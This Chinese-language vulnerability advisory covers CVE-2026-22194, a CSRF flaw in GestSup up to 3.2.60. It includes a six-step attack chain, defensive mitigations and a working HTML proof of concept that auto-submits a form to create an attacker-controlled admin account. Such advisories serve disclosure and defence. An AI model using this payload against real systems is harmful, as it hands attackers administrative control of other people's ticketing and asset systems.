IPBUF安全漏洞报告
English
CVE-2026-22194 CVSS 8.8 高危

CVE-2026-22194 GestSup CSRF漏洞可创建特权账户

披露日期: 2026-01-09

漏洞信息

漏洞编号
CVE-2026-22194
漏洞类型
CSRF (跨站请求伪造)
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
GestSup

相关标签

CSRF跨站请求伪造GestSupITSM特权提升账户创建CVE-2026-22194高危漏洞

漏洞概述

GestSup是一套IT服务管理(ITSM)系统,用于管理工单、资产和用户。该系统存在跨站请求伪造(CSRF)漏洞,攻击者可以诱导已登录的管理员用户执行非预期的操作。漏洞影响GestSup 3.2.60及以下所有版本。由于应用程序未正确验证客户端请求的真实性,攻击者可以构造恶意请求,诱使管理员在不知情的情况下创建具有特权的新账户,从而获得系统的完全控制权。该漏洞的CVSS评分为8.8,属于高危漏洞,攻击复杂度低,无需特殊权限,但需要用户交互。攻击者可通过社会工程学手段,如钓鱼邮件或恶意链接,诱导管理员访问精心设计的页面,触发对管理接口的CSRF攻击。

技术细节

该CSRF漏洞存在于GestSup的用户管理功能中,攻击者可利用此漏洞以管理员身份创建新账户。漏洞的根本原因是应用程序缺少CSRF令牌验证机制,无法确认请求是否来自合法的用户操作。攻击者构造一个包含创建账户参数的HTML表单或JavaScript代码,当管理员访问该页面时,浏览器会自动携带有效的会话cookie向目标服务器发送请求。GestSup的管理接口位于/admin/user/add或类似路径,攻击者可指定新账户的角色为管理员,从而获得系统特权。攻击流程包括:1)攻击者准备恶意HTML页面,包含针对GestSup管理接口的POST请求;2)请求参数包含新账户的用户名、密码和角色信息;3)诱导已登录的管理员访问该页面;4)浏览器自动发送携带有效session的请求;5)服务器执行创建账户操作,返回成功响应。防御措施包括:在所有状态修改操作中实现CSRF令牌验证,检查Referer和Origin头部,启用SameSite Cookie属性。

攻击链分析

STEP 1
步骤1: 信息收集
攻击者识别目标系统使用的GestSup版本,确认版本号<=3.2.60,并定位管理接口路径
STEP 2
步骤2: 构造恶意页面
攻击者创建包含自动提交表单的HTML页面,表单指向GestSup的管理用户创建接口,设置新账户角色为管理员
STEP 3
步骤3: 社会工程攻击
攻击者通过钓鱼邮件、恶意链接或其他方式诱导已登录的管理员访问恶意页面
STEP 4
步骤4: 触发CSRF请求
管理员浏览器自动加载页面并提交POST请求,携带有效的session cookie到目标服务器
STEP 5
步骤5: 账户创建成功
服务器未验证CSRF令牌,执行创建账户操作,攻击者获得管理员权限的系统访问权
STEP 6
步骤6: 持久化控制
攻击者使用新创建的特权账户登录系统,执行进一步的攻击活动如数据窃取或部署后门

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CSRF PoC for CVE-2026-22194: GestSup privileged account creation --> <html> <body> <h1>GestSup CSRF Exploit - Create Admin Account</h1> <p>This page will create a new admin account on GestSup.</p> <form action="http://target-gestsup.com/admin/user/add" method="POST" id="csrf-form"> <input type="hidden" name="username" value="attacker_admin"> <input type="hidden" name="password" value="P@ssw0rd123"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="role" value="admin"> <input type="hidden" name="active" value="1"> <input type="hidden" name="submit" value="Create"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrf-form').submit(); </script> <p>If you see this message, the exploit may have failed.</p> </body> </html>

影响范围

GestSup <= 3.2.60

防御指南

临时缓解措施
如果无法立即升级,可采取以下临时缓解措施:1)临时禁用管理接口的外部访问,限制为内网IP访问;2)监控HTTP Referer头部,拒绝来源异常的请求;3)使用WAF规则阻止针对管理路径的异常POST请求;4)提醒管理员不要点击可疑链接;5)定期检查是否存在未授权的管理员账户。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表